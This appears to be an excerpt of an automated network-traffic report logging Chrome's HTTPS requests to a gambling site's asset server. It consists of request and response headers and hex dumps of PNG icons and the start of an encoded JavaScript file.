                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2664
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-a68"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE26[3],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473785
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6a1c5ee78282e56dbcadc17bedb7ab8b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118215
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC2664INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          695192.168.2.55047690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC553OUTGET /pc/240516-03/static/js/components/menuSubA.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2756
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:53 GMT
                                                                                                                                                          ETag: "6645cacd-ac4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[9],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,7],EU-GER-frankfurt-GLOBAL1-CACHE6[318],EU-GER-frankfurt-GLOBAL1-CACHE8[315,TCP_MISS,317],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 00f13cd25d6bf1c550ededd5c8fbeb03
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823402
                                                                                                                                                          X-CCDN-Expires: 768598
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC2756INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 5a 6b 49 46 30 41 61 41 62 78 51 44 55 42 48 41 44 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 4a 45 39 6b 70 77 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 38 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 5a 57 43 35 4b 52 41 41 58 6b 35 4d 55 51 41 52 50 51 41 4f 59 46 45 68 45 6a 51 30 6e 54 52 4d 45 45 4b 66 4e 49 79 6f 6d 41 68 47 41 70 4a 6d 61 74 45 41 4f 51 42 4e 41 41 39 56 52 71 67 55 7a 44 4b 68 54 44 49 59 6b 6e 55 74 44 6b 78 6d 48 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          696192.168.2.55048590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC382OUTGET /pc/image-pc/index/382/footer/icon_slot.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2340
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-924"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE9[5],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063146
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fffb3fb014b923f2c4ea17a80fa3053a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528854
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC2340INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          697192.168.2.55048390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC608OUTGET /pc/image-pc/index/312/nav/eSports/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC619INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 120577
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:47 GMT
                                                                                                                                                          ETag: "5d71fe7f-1d701"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE14[4],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ca345f18c769c5944b64ef32758d9a75
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 9b 00 00 00 b2 08 06 00 00 00 94 4c 62 b2 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRLbtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: dc 90 b7 a9 8d 66 e7 fc e2 d8 b7 98 4d ac 35 2b 64 d1 61 61 22 8c 59 34 18 be 46 64 65 db ac 48 4c 6c 66 01 16 95 79 01 03 99 9c c8 ca 62 cb e4 32 94 f3 e7 24 e4 d7 22 ec 83 24 e2 07 95 9c 6b 0b 3d 55 7c ac 59 8f 8e 8e 49 c4 0b cc 6b b1 58 90 62 c1 59 4a 44 4d 64 77 39 c5 3f 86 6a c5 c8 da 46 ef 1c b0 02 98 df 42 61 24 21 3a 68 6a 7c 8c ac 16 3d 6b 6b 6e 00 65 99 d9 d2 f1 f3 99 84 99 e1 f3 23 a0 6d 56 f7 23 2c b8 6e 9b cd 84 29 13 62 8d 37 95 10 f6 8b 30 da 42 89 19 0e 73 14 30 1e bd c6 24 1a 20 e6 14 f9 71 30 ff 54 98 51 46 19 40 fd c1 18 e9 78 e3 ab a5 4d 74 49 3c 1e 30 6d 96 cb 7c ed 19 66 d9 4a 44 00 12 cd 07 03 52 de c6 c9 f3 a9 33 18 79 c3 97 79 4e d1 78 4d 2b a6 5d 98 1f 51 36 47 29 0f 15 02 40 60 47 c9 50 84 56 0f 0c d0 6b 5e fd 2a 52 58 ac e4 1f
                                                                                                                                                          Data Ascii: fM5+daa"Y4FdeHLlfyb2$"$k=U|YIkXbYJDMdw9?jFBa$!:hj|=kkne#mV#,n)b70Bs0$ q0TQF@xMtI<0m|fJDR3yyNxM+]Q6G)@`GPVk^*RX
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: e6 c5 86 73 aa 49 29 78 84 10 6a 21 9b 16 63 c9 b2 41 ad ed cd 68 69 6d 87 c3 ed 83 8a 0e 3e 87 d8 d4 4a 0d 39 67 33 e2 e1 69 24 92 59 d8 dd 64 38 0d 7a 77 4f 5f ef ab 47 0e bd d6 b4 bc 7e 57 fc 78 ec 99 57 1a cc ef d1 4b 2b 00 3c 3b 32 85 81 ae ab b6 2f af 56 0a b9 09 72 09 1c 12 6c 74 ff d3 5a 2a 55 75 3a 6f 29 29 bf 37 9b 1d 8d 90 11 01 13 b3 c5 85 3a 19 d7 54 24 26 e1 4b 93 d3 22 45 2a 33 a3 a3 e4 a0 0b b0 f9 dd c4 5c 4c 48 25 92 52 c4 a1 25 87 a4 90 0e 7e 15 14 e4 cc f5 26 8d 34 32 f3 f4 d8 e9 70 ec cf e8 07 cf ae 86 81 ca b9 dd c8 95 57 5c 26 ac 4e cc b6 c4 73 f3 52 cc 88 79 cc 44 9d 2b 15 c9 6a 11 28 66 cc c3 43 23 43 ad 9b e8 9a 69 7f 58 59 80 53 87 1a ab df 1b 8c 48 55 6a a2 2b c7 7b c9 67 33 c1 63 d6 ca 99 29 d3 59 dd 75 cb db 11 8f 27 a1 a1 f7
                                                                                                                                                          Data Ascii: sI)xj!cAhim>J9g3i$Yd8zwO_G~WxWK+<;2/VrltZ*Uu:o))7:T$&K"E*3\LH%R%~&42pW\&NsRyD+j(fC#CiXYSHUj+{g3c)Yu'
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 39 45 38 e2 71 34 aa a4 b3 4b ca 01 a6 03 22 fb 89 69 0c 46 9a f4 c6 76 1a 3d 71 d8 be 60 18 71 41 73 34 96 6c 5e cc d0 b8 b2 90 2b c6 68 31 91 42 de 11 52 54 c1 a2 2f 4d 23 1d 87 d3 e2 78 53 ef a9 73 9c 3c 75 09 d9 84 e7 3f d0 38 e7 6b 18 2c a2 5a 3a b6 86 c6 26 7d a6 a4 27 4f 09 ba 2a 8b 96 61 c3 fa f5 e8 3d 76 4c 53 55 34 a2 ec 94 67 9d c5 62 1a 56 35 80 62 94 f8 ec fc 41 bf 3a 02 0e 38 a3 f4 7a 7d 5d 1d fe ec e3 1f 43 4d 65 54 bb 69 c7 c6 66 d4 b8 57 94 57 a9 7e d5 f4 d4 34 66 e6 96 74 4f 70 10 19 59 69 64 6a 19 69 33 55 11 56 64 a0 02 99 36 63 b8 17 47 45 33 2f 4e fa ad 4d 27 43 67 24 60 c8 ab 53 2a 9a e9 af 15 e7 a2 0a e2 2c 6e 3b 1c af b8 84 62 71 b5 be 62 31 c7 3f bf e2 30 b0 ea 44 75 fc b4 52 fb 6d 26 0b a0 88 95 79 75 30 99 68 ab bf 69 31 d0 10
                                                                                                                                                          Data Ascii: 9E8q4K"iFv=q`qAs4l^+h1BRT/M#xSs<u?8k,Z:&}'O*a=vLSU4gbV5bA:8z}]CMeTifWW~4ftOpYidji3UVd6cGE3/NM'Cg$`S*,n;bqb1?0DuRm&yu0hi1
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: bc da df 94 4c 51 9d da 81 8e 96 7a 1c ee 3d 81 81 a1 71 b4 36 56 0b c2 b1 ab 2e 63 32 65 d4 4a ca 24 20 67 cd 8b 69 c2 1a d9 cb a7 cf 0d e1 f4 d0 04 7a da ab 35 f0 61 d6 48 03 c1 a2 61 67 ed d4 8c f3 95 60 ec c0 1e cc 27 b3 70 05 42 9a 2a a4 94 0f 87 cc 31 20 68 69 ac 97 40 27 64 b0 41 8b 4c 4d 97 ca 7b d9 71 aa 6f 50 f6 76 5a 9f 2d 5b 09 dc 12 64 31 8b 94 ce 16 6f 4b 24 e2 b7 2d c7 63 9f 32 47 34 a4 7f 6e 67 93 4e 17 7e fa 37 6d c5 4f d6 d6 57 e8 03 9a 98 1e 47 b8 a4 54 0b 8d 2c 86 52 b6 82 45 b5 5d 17 ee 42 5d 6d a5 ec 94 9c 6a f5 d0 2b 13 1d 30 37 4f 02 01 8b 50 aa ca aa 69 b0 8c 20 91 7e 81 76 0e 33 3d 91 d5 c8 98 53 e6 0e 9f 3c 67 4c 1b 34 19 16 34 2a 34 04 ca 15 37 91 8c 16 2b 55 4a 24 af f2 db 74 32 76 9d ed 60 a4 1e 68 70 48 66 48 6b 9e d3 67 cc
                                                                                                                                                          Data Ascii: LQz=q6V.c2eJ$ giz5aHag`'pB*1 hi@'dALM{qoPvZ-[d1oK$-c2G4ngN~7mOWGT,RE]B]mj+07OPi ~v3=S<gL44*47+UJ$t2v`hpHfHkg
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 55 e2 0c 64 cd e4 fe 13 53 b3 aa 7f 43 c5 bf fc 68 ba 44 4d 51 e4 a5 85 11 a6 d1 1e 9f c6 f1 93 5d 78 79 f7 01 54 8f bd 81 af 9f 73 1a df ba 2a 81 f7 9d bf 12 55 f5 6b 51 5b 57 83 de 9e 83 1a c9 17 e4 16 60 49 75 8d 6c 2e 71 2a 92 2d 6d d8 b2 45 8c 76 b9 6a a4 3f 73 24 26 d9 d2 8c 5c 4f 3f f2 c6 9b 71 47 d9 b3 78 67 fa 33 92 dd 79 5a a2 20 49 61 9a 38 5c 52 00 75 b4 77 a2 b1 2c 07 db 37 2c 47 9a 0a c9 99 cc c6 89 73 56 29 80 f4 ec 5c d5 a9 88 a4 4b 56 21 86 3d 14 0c a5 22 56 bf 21 ed 68 6f c2 f0 2e 71 21 c8 c0 3c 67 45 ec 8c 04 c3 98 66 45 e7 9c b3 43 69 3f 78 f0 58 9b 67 69 8d d1 68 94 e8 2e a2 f7 c4 41 17 15 14 ab d3 66 36 34 29 eb 94 93 9b 8b 8c 8c 6c 2d bb 32 f3 a1 12 63 7e 7e 81 46 db 6c 74 d6 34 2c 57 24 0f 25 ad 4f 9e 6c 91 7d e9 29 90 81 28 a1 c1
                                                                                                                                                          Data Ascii: UdSChDMQ]xyTs*UkQ[W`Iul.q*-mEvj?s$&\O?qGxg3yZ Ia8\Ruw,7,GsV)\KV!="V!ho.q!<gEfECi?xXgih.Af64)l-2c~~Flt4,W$%Ol})(
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 5a bc 85 17 7b df 91 c3 72 cc 57 e7 e7 5e 39 2b 57 2f 5f 94 37 2e 5d e4 3b b0 ff d0 01 1b 39 2a b7 05 10 6d 42 e0 01 73 f5 bf e0 69 12 b4 0f 97 16 97 d8 89 5e 5f 5d 97 eb 8b b7 e4 a6 af d4 51 10 62 3c d9 85 80 ad ff 99 43 86 0c 1c f5 ef c5 d8 90 2a 77 67 76 86 db be 93 02 ad 09 01 2a 74 ea 2e 68 a5 95 da 61 a2 42 46 27 00 3d c2 32 d7 a2 aa ef fa 94 dc 49 02 a9 11 4a 07 ce c0 3c 40 a3 c1 76 c0 ff 79 8f fc a0 3e 3f 17 fe ad f7 b3 a8 ed 23 f4 5d 48 8d 6b 12 40 01 78 47 f0 9c d1 21 23 10 73 6c e7 83 eb d9 0b 17 e8 51 75 f7 c9 63 54 4d 81 b7 13 c6 8e 98 c6 60 fc c7 6b 33 f5 05 a1 12 83 7f 3f b0 43 ea ef 4a e1 8b b0 96 6b c8 b1 3d d3 72 e6 c0 bc 8c fb 87 7d 0c ea 01 86 d8 c2 bb 53 04 1e 5c 6d 51 4f 95 f1 2c ad 91 2f 6b f2 fd 46 24 2d c3 df 37 97 d7 81 82 c5 ce
                                                                                                                                                          Data Ascii: Z{rW^9+W/_7.];9*mBsi^_]Qb<C*wgv*t.haBF'=2IJ<@vy>?#]Hk@xG!#slQucTM`k3?CJk=r}S\mQO,/kF$-7
                                                                                                                                                          2024-06-09 22:41:24 UTC6508INData Raw: 05 f8 3c 85 59 0e 60 34 87 40 d0 64 42 ee da bd 4f 4c 27 2d f1 c5 52 d7 44 36 75 3e 1d 97 d8 90 73 c9 81 ce f3 cf dd 9f 99 d2 55 fc 90 24 2d e4 ce e2 31 f8 bd 57 6d 4e 19 3c 90 a3 74 50 cd 41 ab e2 84 94 35 3c be f5 af 45 99 c7 5d 56 48 68 04 d3 f4 54 68 14 84 6a 5a ab ef 6e 91 82 00 0e c9 c3 0f 3d 48 14 1a 76 8e c3 4d 13 7e c5 1c 3f 41 b7 ab 7b af 5e 4f d5 b7 01 db c6 f9 46 61 37 e9 df c9 c9 7b ef 96 53 77 dd 25 57 ae 2f ca da d6 06 89 bd d8 fb e0 3a 1f f2 df f7 5b cf 3f af 13 00 28 53 d0 d6 a3 23 e3 13 63 fa ce 6a 9d 6b 59 b5 e0 38 53 65 66 2a 23 b3 26 1c 52 89 42 2d 28 01 45 e7 4b ca c0 f4 94 45 8f 24 1f 5c 2e 93 64 60 87 15 96 e7 ae ac da 9a 32 2e c0 b5 eb ef 47 67 55 b5 f1 8e bb 06 29 e2 78 59 cc d6 80 84 46 78 c0 a0 c8 e8 28 4a 52 bb 7d a8 87 0c 51
                                                                                                                                                          Data Ascii: <Y`4@dBOL'-RD6u>sU$-1WmN<tPA5<E]VHhThjZn=HvM~?A{^OFa7{Sw%W/:[?(S#cjkY8Sef*#&RB-(EKE$\.d`2.GgU)xYFx(JR}Q


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          698192.168.2.55048190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC379OUTGET /pc/image-pc/index/312/nav/casino/04.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40589
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-9e8d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE14[2],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d06e91de8d6d1596fd3f8e1562f6d696
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 75 9c 5d d7 79 ef 8f bf 17 ec bd 0f 9f 61 69 46 6c 4b 96 6c d9 32 c7 31 c4 6c 27 4e 1c ae 1b 66 70 18 4a b7 69 7b 9b de 62 6e 31 0d 35 49 03 0e 43 d3 a0 63 c7 cc 0c b2 2d 8b 2c d6 48 1a 0d cf e1 4d 6b ad df 1f fb cc 48 76 1a 6a d2 de fb fa dd ef f2 eb 78 ce 8c 0e ac bd d7 b3 9e f5 c0 e7 f9 3c 82 ff c3 43 22 7f ad f7 5b ec af 3f 89 dc b1 9c fb c6 7f 1a 9a ab 1c b7 f9 90 d2 03 1a c7 48 d4 6a 0c
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxu]yaiFlKl21l'NfpJi{bn15ICc-,HMkHvjx<C"[?Hj
